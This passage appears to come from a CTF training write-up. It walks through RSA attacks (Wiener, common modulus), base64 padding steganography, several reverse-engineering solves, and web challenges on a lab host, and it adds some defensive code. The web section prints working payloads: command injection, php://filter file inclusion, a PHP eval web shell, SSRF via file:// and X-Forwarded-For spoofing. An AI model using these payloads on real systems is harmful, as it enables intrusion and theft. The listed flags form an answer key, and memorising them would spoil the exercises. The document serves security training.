    par = gmpy2.isqrt(disc)
    return (-b + par) // (2 * a), (-b - par) // (2 * a)

def getGradualFra(cf):
    """Compute every convergent of the list
    :param cf: list of continued fraction terms
    :return: all convergents of that list
    """
    gf = []
    for i in range(1, len(cf) + 1):
        gf.append(gradualFra(cf[:i]))
    return gf

def wienerAttack(e, n):
    """
    :param e: public exponent
    :param n: modulus
    :return: private key d
    """
    cf = continuedFra(e, n)
    gf = getGradualFra(cf)
    for d, k in gf:
        if k == 0:
            continue
        if (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        # b is passed as +(p+q), so the roots come back as -p and -q; their product is still n
        p, q = solve_pq(1, n - phi + 1, n)
        if p * q == n:
            return d

n = 113881698992379349039968368927979997900777221951663104697020683691495129639829918739755194174063944178083527489820939138302751895652076620380510013941997706327553964127612610209509889011613768847759318892303231846117914554931459295347697888260576901354448014917692680573408654658384481284699735788978230690197
e = 39068960413447607023613035707248214114819409621234801785480423979473767995171860917209502861408393208940683687475760366491413173744775811644295874981290403938714121977201901942939425294427737703229098649131737380098596135730392902019429964095866394165971291108245774407908011073271822915371753470010435225545
c = 32897925577913728659288168937025744709859960639901500169867896018406263110205704273203287172003057450591000201857719871686024077615520906540631374442504017489026298422189715372129838501090730593164075113452055617571409044743698645392909829425374093273187125709095368164744188182156849031225036001381531504057

d = wienerAttack(e, n)
m = pow(c, d, n)
print(libnum.n2s(m))
flag{20d6e2da95dcc1fa5f5432a436c4be18}
* rsa
- Challenge
n=7988529900473105188014389056967960086936563867296757743521892517247936779322720860255444942930780242155210428532146832008713545175918837530905634445325434613286924351618434540099301502911121639999829834740539924265403662987413432992208955495360228174246357622824377495215804134031877852138419718863284041289967061947755471763445733857978070389788375692135682151280752698874962994309945007125140767713724007845018476511899517159255148049315657598732020980883906731666463222483082276200161006441236070632697370371903500101576784959354977554163415267670823573732279121475839359214571761531246288036446226453068425024510743430878895525069620567890490274176825219357359655054978914573683875407955166777928775686025208785359965308175183659767780483671664211850622777921251850575660515358213546002740078882179081879033533365462914306416084244064896545443160983307728785861578564664478989753888306751232356332190121325366431859545371415091670360260190699271133604911289835196596206112433828316266654787633268647464346977673202417551515190318166560434792723729979761884387433899987302192101282176134274993622472541295926147573968989742934976154219591883259771200235375181747502029986832498546072186095479928492351
e1*e2=12349
c1=3956941104485053740097867778863463614429523343802296956471207970766235827952284925375087827795398315065603371450397005812384369786270566468341680820768090028044060468385762612396806935151008409193225425849238432409779352207959601347819331509515142408073169950950260068253219043764412165896916157009543178713020910451557374200427834677059361484489014235064296816116750618582307178177624023709365116378669877631012092848323856887350562541185114608178800058247774480383468504515276293218883642235538269485922732048635945261217203958458777210312461803766231193060881859101042463516118251171784131103804920788352354253909269981900724568137387512987776233999939685033257641191756640718996088154059932650574786345139374148096160762489179144433042422947138557706133141328198729630422754608099697399786108410452796399199904862710178981499375104806904012474580305064294378920608192083444296846169807188253384131823042010303863827711800536625250704063697267629139677266911064618161509078464307097931159951662665685590708492737629563830569911494186947500940490462552820677028344009105765700117517667727014044362864193958365235369782682160000975318516878081759300120335955961150426969912205482822422497294769070680558 
c2=1611940015492237858734731702416679090527122709543998562457396582209482921996167319257124263097776719083735533237359282108951840302669400445723290521920778184957860968216955597796434242686387404340853070416671523333827453405378647122312410127116318173381005525906082911269068553644644687609522613704444374579284161594599287938530700830556279127294475519951575045281226065650043844322595522346835332161509830588432537394554004256279802459134435840152155349634866683628780452356511457368210177354837047964988830898418878925069850625303836559634386824904968394360298086999981372436634510871942249878916273086844819675445351650123995763782188534016623013711605415605757989536914844309859096018043139418213410907114483499986615333150567142484962965907979139743566212548602403120444967703145672734078988858122904884088935675452598837463766330894768372179433372531569766978092970858695058828452517992162674715013885642462261934681521697545980035382434568350477172292899604737668561976236375414170887395156146582284416539097502461258716445414441484365722004922543262378425518610840027621580310696876593038167054979299971052068452069502358975143777736130577413933906539382852391849708474118868998134460377344868062
Find the plaintext m.
import libnum
import gmpy2

n=7988529900473105188014389056967960086936563867296757743521892517247936779322720860255444942930780242155210428532146832008713545175918837530905634445325434613286924351618434540099301502911121639999829834740539924265403662987413432992208955495360228174246357622824377495215804134031877852138419718863284041289967061947755471763445733857978070389788375692135682151280752698874962994309945007125140767713724007845018476511899517159255148049315657598732020980883906731666463222483082276200161006441236070632697370371903500101576784959354977554163415267670823573732279121475839359214571761531246288036446226453068425024510743430878895525069620567890490274176825219357359655054978914573683875407955166777928775686025208785359965308175183659767780483671664211850622777921251850575660515358213546002740078882179081879033533365462914306416084244064896545443160983307728785861578564664478989753888306751232356332190121325366431859545371415091670360260190699271133604911289835196596206112433828316266654787633268647464346977673202417551515190318166560434792723729979761884387433899987302192101282176134274993622472541295926147573968989742934976154219591883259771200235375181747502029986832498546072186095479928492351
# 12349 = 233 * 53
e1=233
e2=53
c1=3956941104485053740097867778863463614429523343802296956471207970766235827952284925375087827795398315065603371450397005812384369786270566468341680820768090028044060468385762612396806935151008409193225425849238432409779352207959601347819331509515142408073169950950260068253219043764412165896916157009543178713020910451557374200427834677059361484489014235064296816116750618582307178177624023709365116378669877631012092848323856887350562541185114608178800058247774480383468504515276293218883642235538269485922732048635945261217203958458777210312461803766231193060881859101042463516118251171784131103804920788352354253909269981900724568137387512987776233999939685033257641191756640718996088154059932650574786345139374148096160762489179144433042422947138557706133141328198729630422754608099697399786108410452796399199904862710178981499375104806904012474580305064294378920608192083444296846169807188253384131823042010303863827711800536625250704063697267629139677266911064618161509078464307097931159951662665685590708492737629563830569911494186947500940490462552820677028344009105765700117517667727014044362864193958365235369782682160000975318516878081759300120335955961150426969912205482822422497294769070680558 
c2=1611940015492237858734731702416679090527122709543998562457396582209482921996167319257124263097776719083735533237359282108951840302669400445723290521920778184957860968216955597796434242686387404340853070416671523333827453405378647122312410127116318173381005525906082911269068553644644687609522613704444374579284161594599287938530700830556279127294475519951575045281226065650043844322595522346835332161509830588432537394554004256279802459134435840152155349634866683628780452356511457368210177354837047964988830898418878925069850625303836559634386824904968394360298086999981372436634510871942249878916273086844819675445351650123995763782188534016623013711605415605757989536914844309859096018043139418213410907114483499986615333150567142484962965907979139743566212548602403120444967703145672734078988858122904884088935675452598837463766330894768372179433372531569766978092970858695058828452517992162674715013885642462261934681521697545980035382434568350477172292899604737668561976236375414170887395156146582284416539097502461258716445414441484365722004922543262378425518610840027621580310696876593038167054979299971052068452069502358975143777736130577413933906539382852391849708474118868998134460377344868062

def exp_def(e1,e2,c1,c2,n):
    # Common modulus: gcdext gives s = gcd(e1, e2) and s1, s2 with s1*e1 + s2*e2 = s,
    # so c1^s1 * c2^s2 = m^s (mod n); taking the s-th root recovers m
    s,s1,s2 = gmpy2.gcdext(e1, e2)
    m = gmpy2.iroot((pow(c1,s1,n) * pow(c2 ,s2 ,n)) % n,s)[0]
    return int(m)

m=exp_def(e1,e2,c1,c2,n)
print(libnum.n2s(m))
flag{f96b697d7cb7938d525a2f31aaf161d0}
- Solution approach
* basebase
- Challenge
import base64

def get_diff(s1, s2):
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    res = 0
    for i in range(len(s2)):
        if s1[i] != s2[i]:
            # Subtract the canonical encoding from the stego value to get the hidden data
            return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
    return res

def b64_stego_decode():
    with open("处理过的文本.txt", "rb") as file:
        lines = file.readlines()
    x = ''  # x is the bit string (bin_str)
    print(len(lines))
    count = 0
    for line in lines:
        l = str(line, encoding="utf-8")
        stego = l.strip()  # drop the trailing '\n' (and '\r' on CRLF files)
        #print(stego)
        count = count + 1
        # The print below shows which line fails to decode; find the bad character by eye and fix it by hand
        print(count)
        realtext = base64.b64decode(l)
        #print(realtext)
        realtext = str(base64.b64encode(realtext), encoding="utf-8")
        #print(realtext)
        diff = get_diff(stego, realtext)  # diff is the numeric difference between the stego string and the canonical string
        n = stego.count('=')
        if diff:
            x += bin(diff)[2:].zfill(n * 2)
        else:
            x += '0' * n * 2

    # Turn the bit string into characters, 8 bits at a time, skipping zero bytes
    i = 0
    flag = ''
    while i < len(x):
        if int(x[i:i+8], 2):
            flag += chr(int(x[i:i+8], 2))
        i += 8
    print(len(flag))
    print(flag)

if __name__ == '__main__':
    b64_stego_decode()
flag{guowangjishuxueyuan}
- Solution approach
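Both base64 challenges above (the stego.txt one and basebase) hide data in the unused padding bits of each line. The following is an added example, not part of the original write-up: it reads those bits directly instead of re-encoding and comparing, and it reports malformed and non-canonical lines, which is also how this kind of hidden data is detected. The function names and the sample lines are constructed for illustration.

```python
import string

B64_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"

def padding_bits(line):
    """Return the unused low bits of the last data character as a bit string.

    One '=' leaves 2 unused bits, '==' leaves 4, an unpadded line carries none.
    A canonical encoder always sets these bits to zero.
    Raises ValueError when the line is not well-formed base64.
    """
    body = line.rstrip("=")
    pad = len(line) - len(body)
    if len(line) % 4 or pad > 2 or not body:
        raise ValueError("bad length or padding")
    bad = [ch for ch in body if ch not in B64_ALPHABET]
    if bad:
        raise ValueError("characters outside the alphabet: " + "".join(bad))
    if pad == 0:
        return ""
    unused = 2 * pad
    last = B64_ALPHABET.index(body[-1])
    return format(last & ((1 << unused) - 1), "0{}b".format(unused))

def audit(lines):
    """Return (malformed, non_canonical, bitstream); line numbers are 1-based.

    Malformed lines are reported and contribute no bits, so they must be
    repaired before the bit stream can be trusted.
    """
    malformed, non_canonical, bits = [], [], []
    for number, raw in enumerate(lines, start=1):
        line = raw.strip()
        if not line:
            continue
        try:
            hidden = padding_bits(line)
        except ValueError:
            malformed.append(number)
            continue
        if "1" in hidden:
            non_canonical.append(number)
        bits.append(hidden)
    return malformed, non_canonical, "".join(bits)

def bits_to_bytes(bitstream):
    """Pack the bit stream into bytes, dropping an incomplete trailing group."""
    whole = len(bitstream) - len(bitstream) % 8
    return bytes(int(bitstream[i:i + 8], 2) for i in range(0, whole, 8))

# Constructed sample: six lines carrying the two bytes "Hi" in their padding
# bits, plus one line with a stray character outside the alphabet.
SAMPLE_LINES = [
    "a2V5MU==\n",   # 4 hidden bits: 0100
    "a2V5\n",       # no padding, carries nothing
    "YWK=\n",       # 2 hidden bits: 10
    "YWI=\n",       # canonical, 2 zero bits
    "a2V5M2==\n",   # 4 hidden bits: 0110
    "a2V5NJ==\n",   # 4 hidden bits: 1001
    "a2V5M*==\n",   # malformed: '*' is not a base64 character
]

if __name__ == "__main__":
    malformed, non_canonical, bits = audit(SAMPLE_LINES)
    print("malformed lines:", malformed)
    print("non-canonical lines:", non_canonical)
    print("hidden bytes:", bits_to_bytes(bits))
```
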
III. Decompiling executables and decryption
1. Solving the decompilation range challenges
* Overview of all challenges
* re1
# Bytes copied from the disassembly: each 5-byte group C6 44 24 xx yy is an x86
# `mov byte ptr [stack slot], imm8`, so every 5th byte is one flag character
a=[ 0xC6, 0x44, 0x24, 0x2F, 0x66, 0xC6, 0x44, 0x24, 0x2E, 0x6C,
    0xC6, 0x44, 0x24, 0x2D, 0x61, 0xC6, 0x44, 0x24, 0x2C, 0x67,
    0xC6, 0x44, 0x24, 0x2B, 0x7B, 0xC6, 0x44, 0x24, 0x2A, 0x52,
    0xC6, 0x44, 0x24, 0x29, 0x65, 0xC6, 0x44, 0x24, 0x28, 0x5F,
    0xC6, 0x44, 0x24, 0x27, 0x31, 0xC6, 0x44, 0x24, 0x26, 0x73,
    0xC6, 0x44, 0x24, 0x25, 0x5F, 0xC6, 0x44, 0x24, 0x24, 0x53,
    0xC6, 0x44, 0x24, 0x23, 0x30, 0xC6, 0x44, 0x24, 0x22, 0x5F,
    0xC6, 0x44, 0x24, 0x21, 0x43, 0xC6, 0x44, 0x24, 0x20, 0x30,
    0xC6, 0x44, 0x24, 0x1F, 0x4F, 0xC6, 0x44, 0x24, 0x1E, 0x4C,
    0xC6, 0x44, 0x24, 0x1D, 0x7D ]
flag = ''
# Take the immediate byte (index 4) of every instruction
for i in range(4,len(a),5):
    flag+=chr(a[i])
print(flag)
flag{Re_1s_S0_C0OL}
* re2
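import base64
# DICT is the standard base64 alphabet; DICT1 is the reordered alphabet used by the program
DICT='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
DICT1='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/='
a='pCNxpTJ2d3d5nPoQnSAAnQBel4lihldkikV78nQ='
b=''
# Map every character back to the standard alphabet, then decode normally
for i in range(len(a)):
    b+=DICT[DICT1.index(a[i])]
print(b)
print(base64.b64decode(b))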
flag{B43E_64_i$_INTERESTING!}
* re3
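import base64
a='e3nifIH9b_C@n@dH'
flag=''
# Undo the per-position shift: character i was increased by i
for i in range(len(a)):
    flag+=chr(ord(a[i])-i)
print(flag)
# The shifted string is base64; decoding it gives the text inside the flag
print(base64.b64decode(flag))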
flag{i_l0ve_you}
* re4
# Bytes copied from the disassembly: each 4-byte group C6 45 xx yy is an x86
# `mov byte ptr [stack slot], imm8`, so every 4th byte is one encoded character
a=[0xC6, 0x45, 0xD0, 0x66, 0xC6, 0x45, 0xD1, 0xA0, 0xC6, 0x45,
   0xD2, 0xB6, 0xC6, 0x45, 0xD3, 0xC0, 0xC6, 0x45, 0xD4, 0x77,
   0xC6, 0x45, 0xD5, 0xE0, 0xC6, 0x45, 0xD6, 0x16, 0xC6, 0x45,
   0xD7, 0x41, 0xC6, 0x45, 0xD8, 0x97, 0xC6, 0x45, 0xD9, 0xC0,
   0xC6, 0x45, 0xDA, 0xF7, 0xC6, 0x45, 0xDB, 0xB2, 0xC6, 0x45,
   0xDC, 0x06, 0xC6, 0x45, 0xDD, 0x52, 0xC6, 0x45, 0xDE, 0x06,
   0xC6, 0x45, 0xDF, 0x01, 0xC6, 0x45, 0xE0, 0xD7, 0xC6, 0x45,
   0xE1, 0x21, 0xC6, 0x45, 0xE2, 0x46, 0xC6, 0x45, 0xE3, 0xD0,
   0xC6, 0x45, 0xE4, 0x36, 0xC6, 0x45, 0xE5, 0x40, 0xC6, 0x45,
   0xE6, 0x97]
flag = ''
b=[]
for i in range(3,len(a),4):
    # Swap the high and low nibbles
    b.append(a[i]*16&0xff|a[i]>>4)
print(b)
# Each stored byte is the character XORed with the previous stored byte; undo the chain
flag +=chr(b[0])
for i in range(1,len(b)):
    flag +=chr(b[i]^b[i-1])
print(flag)
flag{youmusTKEEpmoving}
* re5
# Encoded bytes copied from the binary
a2=[
    0x7E, 0x74, 0x75, 0x7F, 0x67, 0x63, 0x24, 0x63, 0x60, 0x65,
    0x74, 0x6D, 0x24, 0x7D, 0x43, 0x25, 0x7A, 0x69]
v5=[]
v7=18
flag=''
# The bytes are handled in groups of three, each position with its own transform
for i in range(0,18,3):
    v5.append(a2[i])
    v5.append(a2[i+1])
    v5.append(a2[i+2])
    flag+=(chr((v7^v5[i])-6))
    flag+=(chr((v5[i+1]^v7)+6))
    flag+=chr(v5[i+2]^6^v7)
print(flag)
flag{w0wtqly0uW1n}
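IV. Red/blue team attack-and-defense exercise: web security
1. Walkthrough of the range's web challenges
* Overview of all challenges
* Intercepting proxy walkthrough
* Interesting features of PHP
- Challenge
Challenge: PHP is a weakly typed language
Solution:
Add to the request header: ?a=PJNPDWY&b=QNKCDZO&c=123&d=php://input
Request body: 123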
flag{ab4ea15bd59038a6c7b823ebeee4b8ba}
* phpBestLanguage
- Challenge
Challenge: http://172.31.27.248:8109 PHP is the best language in the world
Solution:
Request header: ?ac=123&fn=php://input
Request body: 123
flag{5592f1a9fa885a77ba55497e501a101a}
* Command execution: ping ping ping
- Challenge
Solution:
127.0.0.1 | ls
127.0.0.1 | cat f14g_saikjmld98401294.php
flag{random_php_flag_there}
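* File inclusion 2
- Challenge
Challenge: http://172.31.27.248:8107 Can you read the contents of flag.php?
Solution: http://172.31.27.248:8107/index.php?file=php://filter/read=convert.base64-encode/resource=flag.php
This returns the file contents base64-encoded; decode them afterwards.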
flag{792b5e3054812cfe1f41ba3dda2a2948}
- File inclusion
Challenge: http://172.31.27.248:8106 The flag is in the root directory!
Solution: http://172.31.27.248:8106/index.php?file=/flag
flag{d41d8cd98f00b204e9800998ecf8427e}
* File upload
- Challenge
Challenge: http://172.31.27.248:8103 Only GIFs can be uploaded!!!
Solution: <?php @eval($_POST[ljj]); ?>
flag = "flag{ffffffffllllaaggg_!!!}
* ssrf
- Challenge
Challenge: http://172.31.27.248:8102
Solution: http://172.31.27.248:8102/?url=file:///flag.txt
flag{4787370fb09bd230f863731d2ffbff6a}
* xff
- Challenge
Challenge: http://172.31.27.248:8101 Please access the service locally
Solution:
x-forwarded-for:127.0.0.1
referer:http://127.0.0.1
flag{15cc8eee88302965c61497c147e6ca4c}
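The two headers above are accepted because the service treats client-supplied headers as proof of where a request comes from. The following is an added example, not part of the original write-up: it resolves the client address on the server side so that X-Forwarded-For is honoured only when the TCP peer is a known proxy. The function names, the trusted-proxy list and the sample addresses are assumptions constructed for illustration.

```python
import ipaddress

def resolve_client_ip(peer_ip, xff_header, trusted_proxies):
    """Return the address that access decisions should be based on.

    peer_ip         -- address of the TCP peer (cannot be set by a header)
    xff_header      -- raw X-Forwarded-For value, or None
    trusted_proxies -- networks of reverse proxies the operator controls
    """
    trusted = [ipaddress.ip_network(net) for net in trusted_proxies]

    def is_trusted(addr):
        return any(addr in net for net in trusted)

    current = ipaddress.ip_address(peer_ip)
    # A peer that is not one of our proxies wrote the header itself: ignore it.
    if not xff_header or not is_trusted(current):
        return str(current)

    # Each proxy appends the address it saw, so walk right to left and stop at
    # the first hop that is not one of our own proxies.
    hops = [h.strip() for h in xff_header.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            candidate = ipaddress.ip_address(hop)
        except ValueError:
            break  # malformed entry: keep the last verified address
        current = candidate
        if not is_trusted(candidate):
            break
    return str(current)

def is_local_request(peer_ip, xff_header, trusted_proxies):
    """True only when the resolved client address is a loopback address."""
    resolved = resolve_client_ip(peer_ip, xff_header, trusted_proxies)
    return ipaddress.ip_address(resolved).is_loopback

# Constructed sample values (documentation address ranges).
TRUSTED = ["10.0.0.0/8"]

if __name__ == "__main__":
    # Direct client claiming to be local through the header: header is ignored.
    print(resolve_client_ip("203.0.113.7", "127.0.0.1", TRUSTED))
    # Same claim relayed through a trusted proxy: the proxy's entry wins.
    print(resolve_client_ip("10.0.0.5", "127.0.0.1, 198.51.100.23", TRUSTED))
    # A real local connection needs no header at all.
    print(is_local_request("127.0.0.1", None, TRUSTED))
```

The Referer header is equally client-controlled and should not take part in the decision.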
* WEB-GET
- Challenge
Challenge: http://172.31.27.248:1024/
Solution: http://172.31.27.248:1024/?what=flag
flag{Bugku_get_su8kej2en}